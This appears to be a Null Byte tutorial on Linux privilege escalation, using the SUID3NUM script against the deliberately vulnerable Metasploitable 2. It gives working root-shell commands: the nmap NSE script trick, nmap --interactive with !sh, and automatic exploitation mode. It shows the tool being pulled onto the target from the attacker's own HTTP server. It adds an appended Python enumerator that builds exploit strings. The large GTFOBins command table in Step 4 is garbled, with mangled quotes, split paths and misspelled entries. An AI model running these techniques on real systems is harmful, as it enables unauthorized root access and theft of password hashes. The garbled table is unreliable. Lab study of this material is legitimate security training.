
Find and Exploit SUID Binaries with SUID3NUM « Null Byte :: WonderHowTo



File permissions can be a headache on Linux, and when they are configured incorrectly they become a valuable avenue for privilege escalation. SUID binaries are often an easy path to root, but wading through all of the default ones by hand is a huge waste of time. Fortunately, there is a simple script that can speed things up for us.

Let's first discuss SUID, which stands for Set User ID. It is a special permission bit on Linux, separate from the usual read, write and execute permissions. Normally a program runs with the privileges of the user who started it. When the SUID bit is set, however, the program runs with the privileges of the file's owner, regardless of who launched it.

Problems arise when a program (a binary) is owned by root and has the SUID bit set, but other users are allowed to run it. Depending on what the binary does, it can often be coaxed into executing arbitrary commands, which ultimately yields a root shell. Bad for administrators, good for attackers.

SUID3NUM vs. other enumeration scripts

SUID3NUM, which we will use to take advantage of vulnerable SUID binaries, is a Python script that finds SUID binaries, separates the standard ones from the custom ones, and attempts to exploit them using the GTFOBins repository (GTFOBins is an impressive collection of Unix binaries that can be abused for privilege escalation). It is a standalone script that works with both Python 2 and Python 3.

There are other enumeration scripts, such as the popular LinEnum, that will list both standard and custom SUID binaries, but the problem is that they do not distinguish between the two. So unless you are an absolute expert on Unix binaries, it is easy to waste a lot of time trying to exploit binaries that are not exploitable. This is where SUID3NUM really shines: when it finds a binary known to GTFOBins, it prints the command or commands to exploit it, and it even has an option for automatic exploitation.

Below, we use Metasploitable 2, an intentionally vulnerable Ubuntu Linux virtual machine, as the target, and Kali Linux as our local machine.

Step 1: Get a reverse shell on the target

Since SUID3NUM is a post-exploitation enumeration script, we must first exploit the target and get a shell on it. Web applications are sometimes vulnerable to command injection, or misconfigured in ways that let an attacker execute OS commands on the server; such scenarios can easily be abused to obtain a reverse shell. There are many other ways to get a reverse shell as well.

Step 2: Getting SUID3NUM on target

The next step is to upgrade our limited shell to a fully interactive TTY session. Doing this not only gives us tab completion and terminal history, it also makes the remaining post-exploitation steps a lot cleaner and easier. We also want to move to a writable directory, such as /var/tmp, so that we can drop and run our script without any problems.

Let's download SUID3NUM from GitHub onto our local machine. An easy way to do that is with wget:

  ~# wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py

--2020-04-26 12:22:35--  https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12614 (12K) [text/plain]
Saving to: 'suid3num.py'

suid3num.py          100%[==========================>]  12.32K  --.-KB/s    in 0.001s

2020-04-26 12:22:36 (16.1 MB/s) - 'suid3num.py' saved [12614/12614]

Then we can use Python to start a simple HTTP server and use it to transfer the script to the target. We assume that the target has limited internet access, so we have to serve the script ourselves rather than downloading it directly from GitHub on the target.

Start the server with the following command (on Python 3 the equivalent is python3 -m http.server):

  ~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Back in the shell we have on the target, we retrieve the file with wget again, this time pointing at our local machine's IP address and the port of our HTTP server:

  www-data@metasploitable:/var/tmp$ wget http://10.10.0.1:8000/suid3num.py

--14:19:06--  http://10.10.0.1:8000/suid3num.py
           => `suid3num.py'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,614 (12K) [text/plain]

100%[==========================================>] 12,614        --.--K/s

14:19:06 (65.16 MB/s) - `suid3num.py' saved [12614/12614]

We should see the GET request logged on our local machine, indicating that the transfer was successful:

  ~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [26/Apr/2020 12:24:53] "GET /suid3num.py HTTP/1.0" 200 -

Now we can kill the Python server, since we no longer need it.

Step 3: Using SUID3NUM to find SUID bins

To run SUID3NUM on the target, simply execute it with python. The script returns its results in several sections:

  www-data@metasploitable:/var/tmp$ python suid3num.py

(SUID3NUM ASCII-art banner)                      github@Anon-Exploiter

[#] Finding/Listing all SUID binaries ..
------------------------------
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
------------------------------

[!] Standard binaries (don't bother)
------------------------------
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
------------------------------

[~] Custom SUID binaries (interesting stuff)
------------------------------
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/netkit-rlogin
/usr/bin/nmap
/usr/bin/netkit-rcp
/usr/bin/mtr
/usr/sbin/uuidd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/pt_chown
------------------------------

[#] SUID binaries in the GTFOBins list (Hell Yeah!)
------------------------------
/usr/bin/nmap --~> https://gtfobins.github.io/gtfobins/nmap/#suid
------------------------------

[#] Exploit
------------------------------
[&] nmap
'''
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
/usr/bin/nmap --script=$TF
'''

------------------------------

[$] Try the command(s) below to exploit the SUID bins found!!!
------------------------------
------------------------------

[-] Note
------------------------------
If you see any FPs in the output, please report them to make the script better! :)

The first section lists all SUID binaries found on the system. The next section lists the default binaries, with a note that we shouldn't bother with them. The section after that lists custom binaries, and that's where things may get interesting. The last section lists the binaries that also appear in GTFOBins, which means there is a high probability that they can be exploited.

It then gives us the command or commands to exploit any promising SUID binary. Let's try them. First, create a temporary file and store its name in a variable:

  www-data@metasploitable:/var/tmp$ TF=$(mktemp)

Then write the one-line NSE (Lua) script that spawns a shell into that file:

  www-data@metasploitable:/var/tmp$ echo 'os.execute("/bin/sh")' > $TF

And finally run the SUID binary (Nmap) with the --script option pointing at our file. Note that a target (localhost) had to be added to the command; without a target, Nmap has nothing to scan and the script did not run properly:

  www-data@metasploitable:/var/tmp$ /usr/bin/nmap localhost --script=$TF

Starting Nmap 4.53 ( http://insecure.org ) at 2020-04-26 14:45 EDT
SCRIPT ENGINE: Warning: Loading '/tmp/tmp.FrEHDD5051' - the recommended file extension is '.nse'.
sh-3.2#

It works, and it looks like we have a root shell. We can verify with whoami:

  sh-3.2# whoami

root

If whoami had reported www-data instead, the shell would have dropped the root effective UID at startup (bash does this unless it is started with -p); in that case use os.execute("/bin/sh -p") in the script, which is why most of the commands in GTFOBins and in SUID3NUM's own exploitation table end in -p.

Step 4: Add custom commands to SUID3NUM

We can customize SUID3NUM by adding our own binaries to look for and the commands to run against them. Let's edit the script with the nano editor:

  www-data@metasploitable:/var/tmp$ nano suid3num.py

Find the section that looks like this, with the commands used for SUID binary exploitation:

  "" "
Automatic operation of SUID bins - list
"" "

suidExploitation = {
& # 39; tasket & # 39 ;: & # 39; 1 / bin / sh -p & # 39 ;,
& # 39; gdb & # 39 ;: & # 39; -q -nx -ex  & # 39; python import os; os.execl ("/ bin / sh", "sh", "-p")  & # 39; -ex stop & # 39 ;,
& # 39; bash & # 39 ;: & # 39; -p & # 39 ;,
& # 39; busybox & # 39 ;: & # 39; sh & # 39 ;,
& # 39; cat & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; cut & # 39 ;: & # 39; -d "" -f1 / etc / shadow & # 39 ;,
& # 39; dash & # 39 ;: & # 39; -p & # 39 ;,
& # 39; docker & # 39 ;: & # 39; run -v /: / mnt --rm -it alpine chroot / mnt sh & # 39 ;,
& # 39; env & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; expand & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; expect & # 39 ;: & # 39; -c "spawn / bin / sh -p; interaction" & # 39 ;,
& # 39; find & # 39 ;: & # 39 ;. -exec / bin / sh -p \; -stop & # 39 ;,
& # 39; flock & # 39 ;: & # 39; -u / / bin / sh -p & # 39 ;,
& # 39; fold & # 39 ;: & # 39; -w99999999 / etc / shadow & # 39 ;,
& # 39; grep & # 39 ;: & # 39; "" / etc / shadow & # 39 ;,
& # 39; head & # 39 ;: & # 39; -c2G / etc / shadow & # 39 ;,
& # 39; ionice & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; jrunscript & # 39 ;: & # 39; -e "exec ( & # 39; / bin / sh -pc \ $ @ | sh \ $ {IFS} -p _ echo sh -p <$(tty) > $ (tty) 2> $ (tty)  & # 39;) "& # 39 ;,
& # 39; ksh & # 39 ;: & # 39; -p & # 39 ;,
& # 39; ld.so & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; less & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; logsave & # 39 ;: & # 39; / dev / null / bin / sh -i -p & # 39 ;,
& # 39; make & # 39 ;: & # 39; -s --eval = $  & # 39; x: \ n \ t -  & # 39; "/ bin / sh -p" & # 39 ;,
& # 39; more & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; nice & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; nl & # 39 ;: & # 39; -bn -w1 -s & # 39; & # 39; / etc / shadow & # 39 ;,
& # 39; node & # 39 ;: & # 39; node -e  & # 39; require ("child_process"). spawn ("/ bin / sh", ["-p"] {stdio: [0, 1, 2]});  & # 39; & # 39 ;,
& # 39; od & # 39 ;: & # 39; od -An -c -w9999 / etc / shadow | sed -E -e  & # 39; s / // g  & # 39; -e  & # 39; s / \\ n / \ n / g  & # 39; & # 39 ;,
& # 39; perl & # 39 ;: & # 39; -e  & # 39; exec "/ bin / sh";  & # 39; & # 39 ;,
& # 39; pg & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; php & # 39 ;: & # 39; -r "pcntl_exec ( & # 39; / bin / sh  & # 39 ;, ['-p']);" & # 39 ;,
& # 39; python & # 39 ;: & # 39; -c  & # 39; import os; os.execl ("/ bin / sh", "sh", "-p")  & # 39; & # 39 ;,
& # 39; rlwrap & # 39 ;: & # 39; -H / dev / null / bin / sh -p & # 39 ;,
& # 39; rpm & # 39 ;: & # 39; - eval  & # 39;% {lua: os.execute ("/ bin / sh", "-p")}  & # 39; & # 39 ;,
& # 39; rpmquery & # 39 ;: & # 39; - eval  & # 39;% {lua: posix.exec ("/ bin / sh", "-p")}  & # 39; & # 39 ;,
& # 39; rsync & # 39 ;: & # 39; -e  & # 39; sh -p -c "sh 0 <&2 1> & 2"  & # 39; 127.0.0.1: / dev / null & # 39 ;,
& # 39; run-parts & # 39 ;: & # 39; - new-session --regex  & # 39; ^ sh $  & # 39; / bin --arg =  & # 39; - p  & # 39; & # 39 ;,
& # 39; rvim & # 39 ;: & # 39; -c  & # 39 ;: py import os; os.execl ("/ bin / sh", "sh", "-pc", "reset; exec sh -p")  & # 39; & # 39 ;,
& # 39; sed & # 39 ;: & # 39; -e "" / etc / shadow & # 39 ;,
& # 39; setarch & # 39 ;: & # 39; $ (arch) / bin / sh -p & # 39 ;,
& # 39; sort & # 39 ;: & # 39; -m / etc / shadow & # 39 ;,
& # 39; start-stop-daemon & # 39 ;: & # 39; -n $ RANDOM -S -x / bin / sh - -p & # 39 ;,
& # 39; stdbuf & # 39 ;: & # 39; -i0 / bin / sh -p & # 39 ;,
& # 39; strace & # 39 ;: & # 39; -o / dev / null / bin / sh -p & # 39 ;,
& # 39; tail & # 39 ;: & # 39; -c2G / etc / shadow & # 39 ;,
& # 39; time & # 39 ;: & # 39; / bin / sh -p & # 39 ;,
& # 39; timeout & # 39 ;: & # 39; 7d / bin / sh -p & # 39 ;,
& # 39; ul & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; unpand & # 39 ;: & # 39; unpand -t99999999 / etc / shadow & # 39 ;,
& # 39; uniq & # 39 ;: & # 39; / etc / shadow & # 39 ;,
& # 39; unshare & # 39 ;: & # 39; -r / bin / sh & # 39 ;,
& # 39; vim & # 39 ;: & # 39; -c  & # 39 ;: py import os; os.execl ("/ bin / sh", "sh", "-pc", "reset; exec sh -p")  & # 39; & # 39 ;,
& # 39; watch & # 39 ;: & # 39; -x sh -c  & # 39; reset; exec sh 1> & 0 2> & 0  & # 39; & # 39 ;,
& # 39; xargs & # 39 ;: & # 39; -a / dev / null sh -p & # 39 ;,
& # 39; xxd & # 39 ;: & # 39; / etc / shadow | xxd -r & # 39;
} 

There is an easier way to abuse the Nmap binary with a single line instead of the three commands from earlier. The --interactive option, available in older versions of Nmap (2.02 through 5.21), lets OS commands be run from an interactive prompt. Because the binary is SUID root, anything spawned from that prompt also runs as root, so all an attacker has to do is spawn a shell from it.

Add this line to the section with commands in the script:

  'nmap': '--interactive',

Press Ctrl-X, then Y, then Enter to save the file. Now when we run SUID3NUM in automatic exploitation mode with the -e flag, it will attempt to exploit the vulnerable SUID binaries it finds automatically:

  www-data@metasploitable:/var/tmp$ python suid3num.py -e

(banner and the same enumeration sections as in the previous run: all SUID binaries, standard binaries, custom binaries, and the GTFOBins match for /usr/bin/nmap)

[#] Exploit
------------------------------
------------------------------

[$] Auto exploitation of SUID bit binaries!!!
------------------------------

[#] Executing command ...
[~] /usr/bin/nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>

The only caveat with this particular command is that there is no way to have the script run OS commands for us once it drops into Nmap's interactive prompt, so for Nmap the exploitation is not fully automatic. Other SUID binaries, where the whole exploit is a single command, will behave differently.

From the interactive prompt, simply enter !sh to spawn a shell:

  nmap> !sh

sh-3.2#

And since Nmap is running as root, we now have a root shell:

  sh-3.2# whoami

root
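As an added example (not SUID3NUM's code, and not from the original article), the following Python script demonstrates the mechanics described at the start of this tutorial (enumerate files with the setuid bit, separate standard from custom binaries, look the custom ones up in a GTFOBins-style table) together with the command table we edited in Step 4. The allowlist is copied from the "standard binaries" section of the run above and is deliberately short, the command table covers only a handful of binaries, and the {bin} placeholder convention is this example's own (SUID3NUM stores only the argument string and prepends the path itself). The nmap entry adds -p to the spawned shell as a precaution against the shell dropping its effective UID, and each hit is printed alongside the defender-side fix of clearing the setuid bit.

```python
#!/usr/bin/env python3
"""Minimal SUID enumerator in the spirit of SUID3NUM (added example, not the
project's code). Finds setuid files, splits them into standard/custom using an
illustrative allowlist, and maps custom ones to GTFOBins-style commands."""
import os
import stat

# Illustrative allowlist taken from the "standard binaries" section above.
# SUID3NUM ships a much longer list; these entries only serve the example.
STANDARD_SUID = {
    "umount", "fusermount", "su", "mount", "ping", "ping6", "mount.nfs",
    "gpasswd", "traceroute6.iputils", "sudo", "arping", "at", "newgrp",
    "chfn", "chsh", "passwd", "pppd", "dmcrypt-get-device", "ssh-keysign",
}

# GTFOBins-style SUID techniques keyed by basename. "{bin}" is replaced by
# the full path (an assumption of this example). "-p" stops bash from dropping
# the root effective UID when the spawned shell starts.
GTFOBINS_SUID = {
    "nmap": "TF=$(mktemp); echo 'os.execute(\"/bin/sh -p\")' > $TF; "
            "{bin} --script=$TF localhost",
    "find": "{bin} . -exec /bin/sh -p \\; -quit",
    "python": "{bin} -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
    "bash": "{bin} -p",
    "env": "{bin} /bin/sh -p",
}


def is_suid(mode):
    """True for a regular file whose setuid bit is set (mode from os.lstat)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def find_suid(root="/"):
    """Walk `root` without following symlinks; return sorted SUID file paths.
    Same idea as: find / -perm -4000 -type f 2>/dev/null"""
    skip = {"/proc", "/sys", "/dev"}  # pseudo-filesystems, nothing to find
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # unreadable or vanished entry
                continue
            if is_suid(st.st_mode):
                found.append(path)
    return sorted(found)


def classify(paths, standard=STANDARD_SUID):
    """Split SUID paths into (standard, custom) lists by basename."""
    std = [p for p in paths if os.path.basename(p) in standard]
    custom = [p for p in paths if os.path.basename(p) not in standard]
    return std, custom


def exploitable(paths, table=GTFOBINS_SUID):
    """Map each path whose basename is in the table to a concrete command."""
    return {p: table[os.path.basename(p)].format(bin=p)
            for p in paths if os.path.basename(p) in table}


def remediation(path):
    """Defender-side fix for an unwanted SUID binary: clear the setuid bit."""
    return "chmod u-s " + path


def report(root="/"):
    """Print the same sections SUID3NUM prints and return the GTFOBins hits."""
    all_suid = find_suid(root)
    std, custom = classify(all_suid)
    hits = exploitable(custom)
    for title, lines in (("All SUID binaries", all_suid),
                         ("Standard binaries (don't bother)", std),
                         ("Custom SUID binaries (interesting stuff)", custom)):
        print("[#] %s\n%s\n%s" % (title, "\n".join(lines), "-" * 30))
    print("[#] SUID binaries known to GTFOBins")
    for path, cmd in hits.items():
        print("%s\n    exploit: %s\n    fix:     %s"
              % (path, cmd, remediation(path)))
    return hits


if __name__ == "__main__":
    report()
```

Run it as an unprivileged user on the target to get the same four-section view; on the Metasploitable box the only GTFOBins hit would again be /usr/bin/nmap, and the printed fix is the one-liner an administrator would run to close that hole.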

Wrapping Up

Today we learned a bit about SUID binaries and how they can be abused for privilege escalation on Linux systems. We used a script called SUID3NUM to find problematic binaries on the target and even modified it to attempt automatic exploitation. SUID3NUM is a handy script that can cut down the time needed to identify vulnerable SUID binaries during post-exploitation.


Cover Image and Screenshots by drd_ / Null-byte
